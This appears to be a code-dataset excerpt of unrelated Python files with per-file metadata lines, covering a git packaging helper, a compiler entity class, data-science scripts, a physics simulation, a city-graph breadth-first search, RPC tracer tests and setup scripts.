self.dockerfile = os.path.join(self.output, "Dockerfile")
self.noninteractive = noninteractive
self.source_repo_name, self.source_repo_branch, self.source_repo_commit = Git.repo_info(source)
def stage_modified(self):
# Check if there are any files in stage (return code 1). If there are no files
# (return code 0) it means that this is a rebuild, so skip committing
if subprocess.call(["git", "diff-index", "--quiet", "--cached", "HEAD"]):
return True
return False
def prepare(self):
if os.path.exists(self.output):
with Chdir(self.output):
self.log.info("Pulling latest changes in repo %s..." % self.repo)
subprocess.check_output(["git", "fetch"])
subprocess.check_output(["git", "checkout", "-f", self.branch], stderr=subprocess.STDOUT)
subprocess.check_output(["git", "reset", "--hard", "origin/%s" % self.branch])
self.log.debug("Changes pulled")
else:
self.log.info("Cloning %s git repository (%s branch)..." % (self.repo, self.branch))
subprocess.check_output(["rhpkg", "-q", "clone", "-b", self.branch, self.repo, self.output])
self.log.debug("Repository %s cloned" % self.repo)
def clean(self):
""" Removes old generated scripts, repos and cct directories """
with Chdir(self.output):
for d in ["scripts", "repos", "cct"]:
if os.path.exists(d):
self.log.info("Removing old '%s' directory" % d)
subprocess.check_output(["git", "rm", "-rf", d])
def add(self):
# Add new Dockerfile
subprocess.check_call(["git", "add", "Dockerfile"])
for d in ["scripts", "repos", "cct"]:
if os.path.exists(os.path.join(self.output, d)):
subprocess.check_call(["git", "add", d])
def commit(self):
commit_msg = "Sync"
if self.source_repo_name:
commit_msg += " with %s" % self.source_repo_name
if self.source_repo_commit:
commit_msg += ", commit %s" % self.source_repo_commit
# Commit the change
self.log.info("Commiting with message: '%s'" % commit_msg)
subprocess.check_output(["git", "commit", "-q", "-m", commit_msg])
untracked = subprocess.check_output(["git", "ls-files", "--others", "--exclude-standard"])
if untracked:
self.log.warn("There are following untracked files: %s. Please review your commit." % ", ".join(untracked.splitlines()))
diffs = subprocess.check_output(["git", "diff-files", "--name-only"])
if diffs:
self.log.warn("There are uncommited changes in following files: '%s'. Please review your commit." % ", ".join(diffs.splitlines()))
if not self.noninteractive:
subprocess.call(["git", "status"])
subprocess.call(["git", "show"])
if not (self.noninteractive or Tools.decision("Are you ok with the changes?")):
subprocess.call(["bash"])
def push(self):
if self.noninteractive or Tools.decision("Do you want to push the commit?"):
print("")
self.log.info("Pushing change to the upstream repository...")
subprocess.check_output(["git", "push", "-q"])
self.log.info("Change pushed.")
| 2.1875
| 2
|
cpc/entity/Entity.py
|
U-Ar/Cpresto
| 1
|
12784770
|
from abc import ABCMeta,abstractmethod
from abst.Dumpable import Dumpable
class Entity(Dumpable):
def __init__(self,priv,t,name):
self._name = name
self._is_private = priv
self._type_node = t
self.n_refered = 0
self._memref = None
self._address = None
def name(self):
return self._name
def symbol_string(self):
return self._name
@abstractmethod
def is_defined(self):
pass
@abstractmethod
def is_initialized(self):
pass
def is_constant(self):
return False
def value(self):
raise Exception("Entity.value()")
def is_parameter(self):
return False
def is_private(self):
return self._is_private
def type_node(self):
return self._type_node
def type(self):
return self._type_node.type()
def alloc_size(self):
return self.type().alloc_size()
def alignment(self):
return self.type().alignment()
def refered(self):
self.n_refered += 1
def is_refered(self):
return self.n_refered > 0
def set_memref(self,mem):
self._memref = mem
def memref(self):
self.check_address()
return self._memref
def set_address(self,mem):
self._address = mem
def address(self):
self.check_address()
return self._address
def check_address(self):
if self._memref == None and self._address == None:
raise Exception("address did not resolved: "+self._name)
def location(self):
return self._type_node.location()
@abstractmethod
def accept(self,visitor):
pass
def dump(self,dumper):
dumper.print_class(self,self.location())
self._dump(dumper)
@abstractmethod
def _dump(self,dumper):
pass
| 3.1875
| 3
|
usaspending_api/download/tests/unit/test_zip_file.py
|
g4brielvs/usaspending-api
| 217
|
12784771
|
<filename>usaspending_api/download/tests/unit/test_zip_file.py
import os
import zipfile
from tempfile import NamedTemporaryFile
from usaspending_api.download.filestreaming.zip_file import append_files_to_zip_file
def test_append_files_to_zip_file():
with NamedTemporaryFile() as zip_file:
with NamedTemporaryFile() as include_file_1:
with NamedTemporaryFile() as include_file_2:
include_file_1.write(b"this is a test")
include_file_1.flush()
include_file_2.write(b"this is also a test")
include_file_2.flush()
append_files_to_zip_file([include_file_1.name, include_file_2.name], zip_file.name)
with zipfile.ZipFile(zip_file.name, "r") as zf:
assert [z.filename for z in zf.filelist] == [
os.path.basename(include_file_1.name),
os.path.basename(include_file_2.name),
]
| 3.09375
| 3
|
data_model.py
|
SinaKhorami/Titanic-Survival-Prediction
| 0
|
12784772
|
<reponame>SinaKhorami/Titanic-Survival-Prediction
#author: <NAME>
#date: Tue 29 Nov 2016
import numpy as np
import pandas as pd
class Data():
"""docstring for Data"""
def __init__(self):
self.train_df = pd.read_csv('data/train.csv', header = 0)
self.test_df = pd.read_csv('data/test.csv', header = 0)
def getCleanData(self):
self.featureCreation()
self.featureImprovement()
self.featureSelection()
return self.train_df.values, self.test_df.values
def featureCreation(self):
self.train_df['Gender'] = self.train_df['Sex'].map( {'female': 0, 'male': 1} ).astype(int)
self.train_df['FamilySize'] = self.train_df['SibSp'] + self.train_df['Parch']
self.test_df['Gender'] = self.test_df['Sex'].map( {'female': 0, 'male': 1} ).astype(int)
self.test_df['FamilySize'] = self.test_df['SibSp'] + self.test_df['Parch']
def featureImprovement(self):
train_median_ages, test_median_ages = self.getMedianAgesByGenderAndPclass()
self.train_df['AgeNotNan'] = self.train_df['Age']
self.test_df['AgeNotNan'] = self.test_df['Age']
for i in range(0, 2):
for j in range(0, 3):
self.train_df.loc[(self.train_df['Age'].isnull()) & (self.train_df['Gender'] == i) & \
(self.train_df['Pclass'] == j+1), 'AgeNotNan'] = train_median_ages[i, j]
self.test_df.loc[(self.test_df['Age'].isnull()) & (self.test_df['Gender'] == i) & \
(self.test_df['Pclass'] == j+1), 'AgeNotNan'] = test_median_ages[i, j]
self.train_df['Age'] = self.train_df['AgeNotNan']
self.test_df['Age'] = self.test_df['AgeNotNan']
self.train_df.loc[(self.train_df['Fare'].isnull()), 'Fare'] = self.train_df['Fare'].median()
self.test_df.loc[(self.test_df['Fare'].isnull()), 'Fare'] = self.test_df['Fare'].median()
def featureSelection(self):
drop_elements = ['PassengerId', 'Name', 'Sex', 'Ticket', 'Cabin',\
'AgeNotNan', 'Embarked', 'SibSp', 'Parch']
self.train_df = self.train_df.drop(drop_elements, axis = 1)
self.test_df = self.test_df.drop(drop_elements, axis = 1)
def getMedianAgesByGenderAndPclass(self):
train_median_ages = np.zeros((2, 3))
test_median_ages = np.zeros((2, 3))
for i in range(0, 2):
for j in range(0, 3):
train_median_ages[i, j] = self.train_df[(self.train_df['Gender'] == i) & \
(self.train_df['Pclass'] == j+1)]['Age'].dropna().median()
test_median_ages[i, j] = self.test_df[(self.test_df['Gender'] == i) & \
(self.test_df['Pclass'] == j+1)]['Age'].dropna().median()
return train_median_ages, test_median_ages
| 3.234375
| 3
|
100DaysOfDays/Dia01/ex04.py
|
giselemanuel/programming-challenges
| 0
|
12784773
|
"""
Dissecando uma variável:
Faça um programa que leia algo pelo teclado e mostre na tela o
seu tipo primitivo e todas as informações possíveis sobre ele.
"""
print("-------- DISSECANDO UMA VARIÁVEL --------")
entrada = input("Digite algo: ")
print("O tipo primitivo deste valor é: ", type(entrada))
print("Só tem espaços.", entrada.isspace())
print("É um número: ", entrada.isnumeric())
print("Esta em minuscúla: ", entrada.islower())
print("Esta em maiuscúla: ", entrada.isupper())
print("Esta capitalizada: ", entrada.title())
| 4.40625
| 4
|
migration_test.py
|
MathiasSeguy-Android2EE/MigrationProjetsA2ee
| 2
|
12784774
|
from sys import path, stdout
path.insert(0, './git_management')
path.insert(0, './gradle_management')
from git_management import git_init
from gradle_management import migrateFromEclipseToAS
from os import path
from os import scandir
from os import remove
import migration
import errno, os, stat, shutil
import subprocess
from ownStyle import GREEN,BLUE,BOLD,GREEN,RED,RESET,CYAN
from shutil import copytree, ignore_patterns
from colorama import init,deinit
def cleanAmberProject(sourceDirectory):
for file in scandir(sourceDirectory):
if path.isdir(file):
cleanAmberProject(file)
else:
if "AmberProblem.txt" in file.name:
os.remove(file)
#Code of the class
init()
#Constants: Application under test
ActionBarCompatSampleDir='D:\\Git\\FormationAndroid2ee\\Formation_ICS_AS\\ActionBarCompatSample'
AmberDir='D:\\Git\\MyProjets\\AmberTeam'
ChronoDir='D:\\Git\\FormationAndroid2ee\\FormationInitiale_InitGui_AS\\ChronoTuto'
ForecastDir='D:\\Git\\MyProjets\\ForecastYahooRest\\ForecastRestWithLibs'
MyLightDir='D:\\Git\\MyProjets\\MyLight'
FtagDir='D:\\Git\\ProjetsExternes\\Tag\\ft_ag_app'
ActionBarCompatSampleTarget='D:\\Git\\Temp\\Res\\ActionBarCompatSample'
AmberTarget='D:\\Git\\Temp\\Res\\AmberTeam'
ChronoTarget='D:\\Git\\Temp\\Res\\ChronoTuto'
ForecastTarget='D:\\Git\\Temp\\Res\\ForecastRestWithLibs'
MyLightTarget='D:\\Git\\Temp\\Res\\MyLight'
FtagTarget='D:\\Git\\Temp\\Res\\ft_ag_app'
#Launch your test on your targets
print(BLUE+"#############################################")
print(GREEN+"#############################################")
print(RED+"#############################################")
print(CYAN+"#############################################")
print(BOLD+"Starting the migration of the elements")
print(BLUE+"#############################################")
print(GREEN+"#############################################")
print(RED+"#############################################")
print(CYAN+"#############################################\n\n")
errorFound=['list of errors']
successFound=['list of working project']
# cleanAmberProject(AmberDir)
# launchTest(FtagDir,FtagTarget)
result=migration.migrate(ActionBarCompatSampleDir,ActionBarCompatSampleTarget)#Works fine
successFound=successFound+result[0]
errorFound=errorFound+result[1]
result=migration.migrate(AmberDir,AmberTarget)#Failed: AndoidxMigration failed with android.support.design and projectName and myGradleGroupd are Res :(
successFound=successFound+result[0]
errorFound=errorFound+result[1]
result=migration.migrate(ChronoDir,ChronoTarget)#Fine
successFound=successFound+result[0]
errorFound=errorFound+result[1]
result=migration.migrate(ForecastDir,ForecastTarget)#Could not find unknown properties versionCode
successFound=successFound+result[0]
errorFound=errorFound+result[1]
result=migration.migrate(MyLightDir,MyLightTarget)#Fine
successFound=successFound+result[0]
errorFound=errorFound+result[1]
print(BLUE+'final result :')
#https://stackoverflow.com/questions/37340049/how-do-i-print-colored-output-to-the-terminal-in-python/37340245
for elem in successFound:
print(GREEN+elem)
for elem in errorFound:
print(RED+elem)
print(RESET)
deinit()
#This is the step2:Pushing every one in GitHub
# git_init.gitInit(targetDir)
| 2
| 2
|
main.py
|
dz-s/dejavu
| 0
|
12784775
|
from pydub import AudioSegment
import parselmouth
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
def draw_pitch(pitch):
# Extract selected pitch contour, and
# replace unvoiced samples by NaN to not plot
pitch_values = pitch.selected_array['frequency']
pitch_values[pitch_values == 0] = np.nan
plt.plot(pitch.xs(), pitch_values, 'o', markersize=5, color='w')
plt.plot(pitch.xs(), pitch_values, 'o', markersize=2)
plt.grid(False)
plt.ylim(0, pitch.ceiling)
plt.ylabel("fundamental frequency [Hz]")
def draw_spectrogram(spectrogram, dynamic_range=70):
X, Y = spectrogram.x_grid(), spectrogram.y_grid()
sg_db = 10 * np.log10(spectrogram.values)
plt.pcolormesh(X, Y, sg_db, vmin=sg_db.max() -
dynamic_range, cmap='afmhot')
plt.ylim([spectrogram.ymin, spectrogram.ymax])
plt.xlabel("time [s]")
plt.ylabel("frequency [Hz]")
def draw_intensity(intensity):
plt.plot(intensity.xs(), intensity.values.T, linewidth=3, color='w')
plt.plot(intensity.xs(), intensity.values.T, linewidth=1)
plt.grid(False)
plt.ylim(0)
plt.ylabel("intensity [dB]")
if __name__ == '__main__':
sns.set() # Use seaborn's default style to make attractive graphs
# Plot nice figures using Python's "standard" matplotlib library
snd = parselmouth.Sound(
'output.mp3')
# plt.figure()
# plt.plot(snd.xs(), snd.values.T)
# plt.xlim([snd.xmin, snd.xmax])
# plt.xlabel("time [s]")
# plt.ylabel("amplitude")
# # or plt.savefig("sound.png"), or plt.savefig("sound.pdf")
# plt.savefig("sound.png")
pitch = snd.to_pitch()
# If desired, pre-emphasize the sound fragment before calculating the spectrogram
pre_emphasized_snd = snd.copy()
pre_emphasized_snd.pre_emphasize()
spectrogram = pre_emphasized_snd.to_spectrogram(
window_length=0.03, maximum_frequency=8000)
plt.figure()
draw_spectrogram(spectrogram)
plt.twinx()
draw_pitch(pitch)
plt.xlim([snd.xmin, snd.xmax])
plt.savefig("pitch.png")
# sound = AudioSegment.from_mp3(
# '/Users/dimashulhin/Desktop/kyky_original.mp3')
# # get raw audio data as a bytestring
# raw_data = sound.raw_data
# # get the frame rate
# sample_rate = sound.frame_rate
# # get amount of bytes contained in one sample
# sample_size = sound.sample_width
# # get channels
# channels = sound.channels
# beginning = sound[13000:17000]
# print(beginning.raw_data)
| 3.171875
| 3
|
model/engine/inference.py
|
giorgiovaccarino/CSSR
| 0
|
12784776
|
<reponame>giorgiovaccarino/CSSR
import os
from tqdm import tqdm
import torch
import torchvision.transforms as transforms
import numpy as np
import pandas as pd
import wandb
from model.utils.estimate_metrics import PSNR, SSIM, IoU
def inference_for_ss(args, cfg, model, test_loader):
"""
aiu_scoures : test_case(=len(test_loader)) x threshold_case(=99)
"""
global aiu_scores
fnames = []
max_iter = len(test_loader)
psnr_scores = np.array([])
ssim_scores = np.array([])
psnr = PSNR()
ssim = SSIM()
iou = IoU()
os.makedirs(os.path.dirname(os.path.join(args.output_dirname, "images")), exist_ok=True)
os.makedirs(os.path.dirname(os.path.join(args.output_dirname, "masks")), exist_ok=True)
if args.test_aiu:
thresholds = [i*0.01 for i in range(1, 100)]
iou_mode = "AIU"
else:
thresholds = [0.5]
iou_mode = "IoU"
if args.wandb_flag:
# --- wandb setting https://docs.wandb.ai/integrations/pytorch --- #
wandb.init(config=cfg, project=args.wandb_prj_name)
# if args.dataset_cfg == "":
# wandb.init(config=cfg, project=args.wandb_prj_name)
# else:
# wandb.init(config=cfg, project= f"{args.wandb_prj_name}_{args.dataset_cfg}")
wandb.config.update(args)
wandb.run.name = cfg.OUTPUT_DIR.replace("output/", "")
# Magic
wandb.watch(model, log='all')
print('Evaluation Starts')
print(f'Number of test dataset : {len(test_loader) * args.batch_size}')
model.eval()
for iteration, (imgs, sr_targets, masks, fname) in enumerate(test_loader, 1):
fnames += list(fname)
sr_preds, segment_preds = model(imgs)
# SR evaluation
if not cfg.MODEL.SR_SEG_INV and cfg.MODEL.SCALE_FACTOR != 1:
sr_preds[sr_preds>1] = 1 # clipping
sr_preds[sr_preds<0] = 0 # clipping
psnr_scores = np.append(psnr_scores, psnr(sr_preds, sr_targets.to("cuda")))
ssim_scores = np.append(ssim_scores, ssim(sr_preds, sr_targets.to("cuda")))
save_img(args.output_dirname, sr_preds, fname)
else:
psnr_scores = np.append(psnr_scores, 0)
ssim_scores = np.append(ssim_scores, 0)
# Segmentation evaluation
for iou_th in tqdm(thresholds):
segment_preds_bi = (segment_preds.to("cuda") >= torch.Tensor([iou_th]).to("cuda")).float()
# segment_preds_bi, segment_preds_bi_down = up_scale(segment_preds_bi, cfg)
if iou_th * 100 % 10 == 0 or iou_th == 0.01 or iou_th == 0.99:
save_mask(args, segment_preds_bi, fname, iou_th)
if 'iou_scores' in locals():
iou_scores = np.append(iou_scores, iou(segment_preds_bi, masks.to("cuda"))[:, np.newaxis], axis=1)
else:
# print(iou(segment_preds_bi, masks.to("cuda")).shape)
iou_scores = np.copy(iou(segment_preds_bi, masks.to("cuda"))[:, np.newaxis])
if 'aiu_scores' in locals():
aiu_scores = np.append(aiu_scores, iou_scores, axis=0)
else:
aiu_scores = np.copy(iou_scores)
if args.wandb_flag:
# wandb
wandb.log({"PSNR_score": psnr_scores[-1],
"SSIM_score":ssim_scores[-1],
f"{iou_mode}_scores": np.mean(iou_scores),
})
del iou_scores
if iteration % 10 == 0:
print(f"estimation {iteration/max_iter*100:.4f} % finish!")
print(f"PSNR_mean:{np.mean(psnr_scores):.4f} SSIM_mean:{np.mean(ssim_scores):.4f} {iou_mode}_mean:{np.mean(aiu_scores):.4f}")
print(f"estimation finish!!")
print(f"PSNR_mean:{np.mean(psnr_scores):.4f} SSIM_mean:{np.mean(ssim_scores):.4f} {iou_mode}_mean:{np.mean(aiu_scores):.4f} ")
if args.wandb_flag:
wandb.log({"PSNR_score_mean": np.mean(psnr_scores),
"SSIM_score_mean":np.mean(ssim_scores),
f"{iou_mode}_scores_mean": np.mean(aiu_scores),
})
if args.test_aiu:
plot_metrics_th(aiu_scores, thresholds, "IoU")
# save_iou_log(aiu_scores, thresholds, fnames, args.output_dirname) # Output IoU scores as csv file.
def save_img(dirname, sr_preds, fname):
# print(fpath)
for batch_num in range(sr_preds.size()[0]):
if sr_preds.shape[1] == 3:
sr_pred = transforms.ToPILImage(mode='RGB')(sr_preds[batch_num])
elif sr_preds.shape[1] == 1:
sr_pred = transforms.ToPILImage(mode='L')(sr_preds[batch_num])
os.makedirs(os.path.dirname(dirname+f"/images/"), exist_ok=True)
fpath = os.path.join(dirname+f"/images/", f"{fname[batch_num]}")
sr_pred.save(fpath)
def save_mask(args, segment_predss, fname, iou_th, add_path=""):
# print(segment_predss.shape)
for batch_num in range(segment_predss.size()[0]):
th_name = f"th_{iou_th:.2f}"
segment_predss = segment_predss.to("cpu")
segment_preds = transforms.ToPILImage()(segment_predss[batch_num])
os.makedirs(os.path.dirname(os.path.join(args.output_dirname+f"/masks{add_path}/{th_name}/")), exist_ok=True)
mpath = os.path.join(args.output_dirname+f"/masks{add_path}/{th_name}/", f"{fname[batch_num]}".replace("jpg", 'png'))
segment_preds.save(mpath)
def plot_metrics_th(metrics_scores, thresholds, metrics):
metrics_scores = np.mean(metrics_scores, axis=0)
for iou, th in zip(metrics_scores, thresholds):
wandb.log({f"{metrics}(thresholds)": iou,
"thresholds":th,
})
def save_iou_log(aiu_scores, thresholds, fnames, output_dir):
df = pd.DataFrame(aiu_scores, columns=thresholds, index=fnames)
df.to_csv(os.path.join(output_dir, 'iou_log.csv'))
print('IoU log saved!!')
print(df)
| 2.15625
| 2
|
busca_em_largura.py
|
abiassantana/busca-em-largura
| 1
|
12784777
|
graph = {'joao pessoa':['itabaiana', 'campina grande', 'santa rita'],
'itabaiana': ['joao pessoa','campina grande'],
'campina grande': ['joao pessoa','itabaiana','areia','coxixola', 'soledade'],
'santa rita': ['joao pessoa','mamanguape'],
'mamanguape': ['santa rita','guarabira'],
'guarabira':['mamanguape','areia'],
'areia':['guarabira','campina grande'],
'soledade': ['campina grande','picui', 'patos'],
'coxixola': ['campina grande', 'monteiro'],
'picui':['soledade'],
'patos': ['soledade','itaporanga', 'pombal'],
'monteiro': ['coxixola','itaporanga'],
'pombal': ['patos','catole do rocha', 'sousa'],
'itaporanga': ['patos','monteiro','cajazeiras'],
'catole': ['pombal'],
'sousa': ['pombal','cajazeiras'],
'cajazeiras': ['itaporanga', 'sousa']
}
class busca_em_largura(object):
def __init__(self, graph, initial_state, final_state):
self.graph = graph
self.initial_state = initial_state
self.final_state = final_state
self.explored = []
self.bordas = []
#recebe uma string corespondente a um ponto no grapfo
#adiciona a borda os pontos nao explorados
def find_borda(self, point):
for borda in graph[point]:
if borda not in self.bordas:
if borda not in self.explored:
self.bordas.append(borda)
def explore(self, point, steps):
self.explored.append(point)
if point != self.initial_state:
self.bordas.remove(point)
self.find_borda(point)
def walk(self):
while self.final_state not in self.explored:
#print(self.bordas)
if len(self.bordas)>0:
self.explore(self.bordas[0])
def search(self):
self.explore(self.initial_state)
self.walk()
print(self.explored)
busca = busca_em_largura(graph,'joao pessoa', 'cajazeiras')
busca.search()
| 3.171875
| 3
|
setup.py
|
ADACS-Australia/PyFHD
| 2
|
12784778
|
from setuptools import setup
setup(
name = "PyFHD",
version = 1.0,
author = "ADACS - Astronomy Data and Computing Services",
url = "https://github.com/ADACS-Australia/PyFHD",
python_requires=">=3.7",
packages = ['PyFHD'],
description = 'Python Fast Holograhic Deconvolution: A Python package that does efficient image deconvolution for general radio astronomy, fast-mode Epoch of Reionization analysis, and simulation.',
long_description = open("README.md").read(),
long_description_content_type = 'text/markdown',
classifiers = [
"Programming Language :: Python :: 3",
"License :: MIT License",
"Operating System :: OS Independent",
],
entry_points = {
'console_scripts' : ['pyfhd = PyFHD.pyfhd:main'],
}
)
| 1.226563
| 1
|
setup.py
|
flatironinstitute/reactopy
| 7
|
12784779
|
import setuptools
import os
with open(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'reactopya', 'VERSION')) as version_file:
version = version_file.read().strip()
setuptools.setup(
name="reactopya",
version=version,
author="<NAME>",
author_email="<EMAIL>",
description="",
packages=setuptools.find_packages(),
scripts=['bin/reactopya', 'bin/reactopya-server'],
include_package_data=True,
install_requires=[
"jinja2",
"numpy",
"simplejson"
],
classifiers=(
"Programming Language :: Python :: 3",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
)
)
| 1.40625
| 1
|
initialization_routines/initialize_hcp.py
|
kolbt/whingdingdilly
| 4
|
12784780
|
import sys
sys.path.append('/Users/kolbt/Desktop/compiled/hoomd-blue/build')
import hoomd
from hoomd import md
from hoomd import dem
from hoomd import deprecated
import numpy as np
# Simulation box mesh into grid delimit by particle diameter
# list of mesh indices random number generator to select index
# remove index from list once particle is placed
tsteps = 5000000
dump_freq = 10000
part_perc_a = 50
part_frac_a = float(part_perc_a) / float(100)
pe_a = 80
pe_b = 300
phi = 0.6
part_num = 24102
dumps = tsteps/dump_freq
diameter = 1
# find the box parameters
area_part = np.pi * ((float(diameter)/float(2))**2) * part_num
box_area = area_part / phi
side = int(np.sqrt(box_area))
side = 140
#while side % 10 != 0: # this is sub par... fix it
#side += 1 # or just pick part_num so that this is okay
# initialize system randomly
hoomd.context.initialize()
part_num = 13950
part_a = part_num * part_frac_a # get the total number of A particles
part_a = int(part_a)
part_b = part_num - part_a # get the total number of B particles
mid = int(part_a) # starting point for assigning B particles
snap = hoomd.data.make_snapshot(N = part_num,
box = hoomd.data.boxdim(L=side,
dimensions=2),
particle_types = ['A', 'B'])
part = np.zeros((3))
start_y = -69.5 # box is -70:70 for x and y dimensions
sep_row = 0.90 # distance between particles along x axis
sep_col = 0.78 # distance to increment rows (maintains center to center distance)
ith = 0 # particle counter
m = 0 # incrementer for y value
row = 2 # start on an even row (this determines first x placement in row)
# Places particles in lower left quadrant (-70, -70) - (0, 0)
# while loop that increments y value
while 1:
part[0] = start_y + m
n = 0
# while that increments x value (place row at constant height, y value)
while 1:
# ensures rows are offset from one another
if row % 2 == 0:
start_x = -69.50
else:
start_x = -69.05
part[1] = start_x + n
snap.particles.position[ith] = part
snap.particles.typeid[ith] = 0
ith += 1
n += sep_row
# placing into lower left quadrant
if start_x + n > 0:
break
row += 1
m += sep_col
# ensure particles are limited to lower left quadrant
if -69.5 + m > 0:
break
# Places particles in upper right quadrant (0,0) - (70, 70)
m = 0
row = 2
start_y = 0.5
while 1:
part[0] = start_y + m
n = 0
while 1:
if row % 2 == 0:
start_x = 0.5
else:
start_x = 0.95
part[1] = 0.5 + n
snap.particles.position[ith] = part
snap.particles.typeid[ith] = 1
ith += 1
n += sep_row
if start_x + n > 70:
break
row += 1
m += sep_col
if start_y + m > 70:
break
print(ith)
print(ith)
# now let's get the quaternion and moment of inertia
thetas = np.random.uniform(0, 2*np.pi, (part_num,)) # generate random angles
quats = np.array([np.cos(thetas/2),
np.zeros_like(thetas),
np.zeros_like(thetas),
np.sin(thetas/2)]).T # generate quaternions from the angles
snap.particles.orientation[:] = quats
inertia = float(1)/float(16)
snap.particles.diameter[:] = 1 # set particle diameters
snap.particles.moment_inertia[:] = (inertia, inertia, 0) # set moment of inertia
snap.particles.types = ['A', 'B'] # or 0, 1 in typeid vernacular
####################################
### NOW SET FORCES / INTEGRATORS ###
####################################
# initialize the system
system = hoomd.init.read_snapshot(snap)
all = hoomd.group.all()
gA = hoomd.group.type(type = 'A', update=True)
gB = hoomd.group.type(type = 'B', update=True)
N = len(all)
part_num = N
Na = len(gA)
Nb = len(gB)
print(part_num)
nl = hoomd.md.nlist.cell()
lj = hoomd.md.pair.lj(r_cut=2**(1/6), nlist=nl)
lj.set_params(mode='shift')
lj.pair_coeff.set('A', 'A', epsilon=1.0, sigma=1.0)
lj.pair_coeff.set('A', 'B', epsilon=1.0, sigma=1.0)
lj.pair_coeff.set('B', 'B', epsilon=1.0, sigma=1.0)
angle = np.random.rand(part_num) * 2 * np.pi # random orientation of each particle
if part_perc_a != 0 and part_perc_a != 100:
activity_a = []
for i in range(0,mid):
x = (np.cos(angle[i])) * pe_a
y = (np.sin(angle[i])) * pe_a
z = 0
tuple = (x, y, z)
activity_a.append(tuple)
activity_b = []
for i in range(mid,part_num):
x = (np.cos(angle[i])) * pe_b
y = (np.sin(angle[i])) * pe_b
z = 0
tuple = (x, y, z)
activity_b.append(tuple)
hoomd.md.force.active(group=gA,
seed=123,
f_lst=activity_a,
rotation_diff=3.0,
orientation_link=False)
hoomd.md.force.active(group=gB,
seed=375,
f_lst=activity_b,
rotation_diff=3.0,
orientation_link=False)
else:
if part_perc_a == 0:
activity_b = []
for i in range(0,part_num):
x = (np.cos(angle[i])) * pe_b
y = (np.sin(angle[i])) * pe_b
z = 0
tuple = (x, y, z)
activity_b.append(tuple)
hoomd.md.force.active(group=gB,
seed=375,
f_lst=activity_b,
rotation_diff=3.0,
orientation_link=False)
else:
activity_a = []
for i in range(0,part_num):
x = (np.cos(angle[i])) * pe_a
y = (np.sin(angle[i])) * pe_a
z = 0
tuple = (x, y, z)
activity_a.append(tuple)
hoomd.md.force.active(group=gA,
seed=123,
f_lst=activity_a,
rotation_diff=3.0,
orientation_link=False)
# minimize for no overlaps
fire=hoomd.md.integrate.mode_minimize_fire(group=all,
dt=0.00001,
ftol=1e-2,
Etol=1e-7)
hoomd.run(1000)
# brownian integration
hoomd.md.integrate.mode_standard(dt=0.000002)
bd = hoomd.md.integrate.brownian(group=all, kT=0.5, seed=123)
bd.set_gamma('A', gamma=1.0)
bd.set_gamma_r('A', gamma_r=1.0)
#write dump
hoomd.dump.gsd("hcp_test.gsd", period=1000, group=all, overwrite=True, static=[])
#run
hoomd.run(tsteps)
| 2.328125
| 2
|
tests/client/test_tracer.py
|
bernhardkaindl/pjrpc
| 0
|
12784781
|
<gh_stars>0
import json
from xjsonrpc.common import BatchRequest, BatchResponse, Request, Response
from xjsonrpc import client
import pytest
@pytest.mark.parametrize(
'req, resp, exc', [
(
Request(id=1, method='method', params=[1, '2']),
Response(id=1, result='result'),
None,
),
(
BatchRequest(Request(id=1, method='method', params=[1, '2'])),
BatchResponse(Response(id=1, result='result')),
None,
),
(
BatchRequest(Request(id=1, method='method', params=[1, '2'])),
None,
BaseException(),
),
],
)
def test_request_tracing(mocker, req, resp, exc):
class Client(client.AbstractClient):
def _request(self, request_text, is_notification=False, **kwargs):
if exc:
raise exc
return json.dumps(resp.to_json())
class Tracer(client.Tracer):
on_request_begin = mocker.Mock('on_request_begin')
on_request_end = mocker.Mock('on_request_end')
on_error = mocker.Mock('on_error')
tracer = Tracer()
cli = Client(tracers=(tracer,))
trace_ctx = object()
if exc:
with pytest.raises(BaseException):
cli.send(req, _trace_ctx=trace_ctx)
tracer.on_error.assert_called_once_with(trace_ctx, req, exc)
else:
if isinstance(req, BatchRequest):
cli.batch.send(req, _trace_ctx=trace_ctx)
else:
cli.send(req, _trace_ctx=trace_ctx)
tracer.on_request_begin.assert_called_once_with(trace_ctx, req)
tracer.on_request_end.assert_called_once_with(trace_ctx, req, resp)
@pytest.mark.parametrize(
'req, resp, exc', [
(
Request(id=1, method='method', params=[1, '2']),
Response(id=1, result='result'),
None,
),
(
BatchRequest(Request(id=1, method='method', params=[1, '2'])),
BatchResponse(Response(id=1, result='result')),
None,
),
(
BatchRequest(Request(id=1, method='method', params=[1, '2'])),
None,
BaseException(),
),
],
)
async def test_async_request_tracing(mocker, req, resp, exc):
class Client(client.AbstractAsyncClient):
async def _request(self, request_text, is_notification=False, **kwargs):
if exc:
raise exc
return json.dumps(resp.to_json())
class Tracer(client.Tracer):
on_request_begin = mocker.Mock('on_request_begin')
on_request_end = mocker.Mock('on_request_end')
on_error = mocker.Mock('on_error')
tracer = Tracer()
cli = Client(tracers=(tracer,))
trace_ctx = object()
if exc:
with pytest.raises(BaseException):
await cli.send(req, _trace_ctx=trace_ctx)
tracer.on_error.assert_called_once_with(trace_ctx, req, exc)
else:
if isinstance(req, BatchRequest):
await cli.batch.send(req, _trace_ctx=trace_ctx)
else:
await cli.send(req, _trace_ctx=trace_ctx)
tracer.on_request_begin.assert_called_once_with(trace_ctx, req)
tracer.on_request_end.assert_called_once_with(trace_ctx, req, resp)
| 2.140625
| 2
|
access_audit/middleware.py
|
cforlando/intake
| 51
|
12784782
|
from intake.middleware import MiddlewareBase
from easyaudit.middleware.easyaudit import clear_request
class ClearRequestMiddleware(MiddlewareBase):
def process_response(self, response):
clear_request()
| 1.6875
| 2
|
object_segmentation.py
|
lyclyc52/nerf_with_slot_attention
| 1
|
12784783
|
from object_segmentation_helper import *
os.environ['CUDA_VISIBLE_DEVICES'] = '2,3'
base_dir = '/data/yliugu/ONeRF/results/testing_clevrtex_animal2'
datadir = '/data/yliugu/ONeRF/data/nerf_synthetic/clevrtex_animal2'
input_size = 400
images, poses, depth_maps, render_poses, hwf, i_split = load_data(
datadir, size = input_size)
first_cluster_dir = os.path.join(base_dir, 'first_cluster')
os.makedirs(first_cluster_dir, exist_ok=True)
mask_refine_dir = os.path.join(base_dir, 'mask_refine')
os.makedirs(mask_refine_dir, exist_ok=True)
segmentation_dir = os.path.join(base_dir, 'segmentation')
os.makedirs(segmentation_dir, exist_ok=True)
N_imgs =100
images, depth_maps, poses = images[:N_imgs, :, :, :3], depth_maps[:N_imgs], poses[:N_imgs]
